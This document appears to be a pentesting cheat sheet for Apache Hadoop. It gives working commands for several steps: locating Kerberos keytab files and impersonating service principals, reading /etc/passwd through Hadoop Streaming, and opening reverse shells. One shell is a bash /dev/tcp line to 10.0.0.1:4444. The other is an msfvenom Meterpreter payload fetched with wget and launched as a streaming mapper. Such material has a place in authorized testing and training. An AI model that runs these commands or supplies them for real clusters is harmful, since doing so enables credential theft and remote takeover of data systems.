Apache Hadoop Pentesting
Last modified: 2023-04-02
Apache Hadoop is a collection of open-source software utilities that facilitates using a network of many computers to solve problems involving massive amounts of data and computation. It uses ports 8020, 9000, 50010, 50020, 50070, 50075, 50475 by default.
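When probing a target, a quick scan of those default ports helps confirm a Hadoop deployment (a minimal sketch; <target_ip> is a placeholder):
# Check the default Hadoop ports and identify service versions
nmap -sV -p 8020,9000,50010,50020,50070,50075,50475 <target_ip>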
Authenticate using Keytab
Keytab files are used to authenticate to the KDC (Key Distribution Center) in Kerberos authentication. To find them, execute the following command on the target system.
find / -type f -name "*.keytab" 2>/dev/null
After finding them, we can use them to gather information or authenticate.
# Gather information from a keytab
# -k: Specify a keytab file
klist -k /path/to/example.keytab
# Authenticate to the Kerberos server and request a ticket.
# <principal_name>: stored in example.keytab; run 'klist -k example.keytab' to check it.
# -k: Use a keytab
# -V: verbose mode
# -t <keytab_file>: Filename of keytab to use
kinit <principal_name> -k -V -t /path/to/example.keytab
# e.g.
kinit user/hadoop.docker.com@EXAMPLE.COM -k -V -t /path/to/example.keytab
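If authentication succeeds, the ticket should appear in the credential cache:
# List tickets in the current credential cache
klist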
Impersonate Another Hadoop Service
We can authenticate as other Hadoop services by executing klist and kinit with their keytab files. Then we can investigate the HDFS service using the HDFS commands below.
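For example, assuming we found a keytab for the hdfs service principal (the path and principal below are hypothetical):
# Check which principals the keytab contains
klist -k /etc/security/keytabs/hdfs.keytab
# Authenticate as the hdfs service principal
kinit hdfs/hadoop.docker.com@EXAMPLE.COM -k -V -t /etc/security/keytabs/hdfs.keytab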
HDFS Commands
Find HDFS Binary Path
When authenticated, we need to find the path of the hdfs command that ships with Hadoop. This command allows us to execute file system commands against the datalake.
If the binary is in the default PATH (confirm by running echo $PATH), we don't have to find it. Otherwise, locate it by running the following command.
find / -type f -name hdfs 2>/dev/null
Once we find the path, go to that directory and use the commands below.
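Alternatively, add that directory to PATH so the hdfs command can be run from anywhere (the Hadoop directory below is hypothetical):
# Make the hdfs binary available in this shell session
export PATH=$PATH:/opt/hadoop/bin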
HDFS Command Cheat Sheet
Please refer to https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HDFSCommands.html#Overview
As mentioned above, if the hdfs binary is not in the PATH, we need to go to the directory where it exists.
Basically, the subcommands are similar to UNIX file system commands.
hdfs dfs -help
# List files in the hdfs service root.
hdfs dfs -ls /
# -R: Recursive
hdfs dfs -ls -R /
# Get the contents of the file
hdfs dfs -cat /example.txt
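A few more operations are commonly useful during enumeration (paths are examples):
# Download a file from HDFS to the local file system
hdfs dfs -get /example.txt /tmp/example.txt
# Create a directory on HDFS
hdfs dfs -mkdir /tmp/dir
# Remove a file
hdfs dfs -rm /example.txt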
RCE (Remote Code Execution)
First we need to create an arbitrary file that contains at least one character, then put it on HDFS.
echo hello > /tmp/hello.txt
hdfs dfs -put /tmp/hello.txt /tmp/hello.txt
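We can verify that the file landed on HDFS:
# Should print "hello"
hdfs dfs -cat /tmp/hello.txt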
Hadoop Streaming can be abused to run arbitrary OS commands.
Note that the -output directory must not already exist; to run the job multiple times, delete the previous output directory or specify another name.
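The path of the hadoop-streaming jar varies by installation; if it is unknown, locate it first:
# Find the Hadoop Streaming jar on the target
find / -name "hadoop-streaming*.jar" 2>/dev/null
Then run the streaming job: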
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "cat /etc/passwd" -reducer NONE
We can see the result of the command in the output directory. For example,
hdfs dfs -ls /tmp/output
hdfs dfs -cat /tmp/output/part-00000
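As noted above, the output directory must be deleted before re-running the job with the same -output path:
# -r: Recursively delete the previous job output
hdfs dfs -rm -r /tmp/output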
Reverse Shell
On the target machine, create a reverse shell script and put it on HDFS.
echo '#!/bin/bash' > /tmp/shell.sh
echo '/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' >> /tmp/shell.sh
chmod +x /tmp/shell.sh
hdfs dfs -put /tmp/shell.sh /tmp/shell.sh
On the local machine, start a listener.
nc -lvnp 4444
Now execute the following command.
# -mapper: The command the job runs (the shipped shell.sh)
# -file: The local path of shell.sh, shipped to the job
# -background: Submit the job without waiting for it to complete
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.sh" -reducer NONE -file "/tmp/shell.sh" -background
We should receive a shell on the local machine's listener.
Reverse Shell (MsfVenom)
First, create a reverse shell payload with msfvenom on the local machine and prepare a listener using msfconsole.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf
msfconsole
msf> use exploit/multi/handler
msf> set payload linux/x86/meterpreter/reverse_tcp
msf> set lhost 10.0.0.1
msf> set lport 4444
msf> run
Transfer the payload to the target machine.
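The wget below assumes the payload is served over HTTP from the local machine, e.g.:
# On the local machine, serve the directory containing shell.elf
python3 -m http.server 8000
Then, on the target machine: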
wget http://10.0.0.1:8000/shell.elf -O /tmp/shell.elf
chmod +x /tmp/shell.elf
# Put it on HDFS.
hdfs dfs -put /tmp/shell.elf /tmp/shell.elf
Now execute the following command.
# -mapper: The command the job runs (the shipped shell.elf)
# -file: The local path of shell.elf, shipped to the job
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.elf" -reducer NONE -file "/tmp/shell.elf" -background
We should get a Meterpreter session. To spawn an OS shell, run the shell command in Meterpreter.
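For example:
meterpreter > shell
whoami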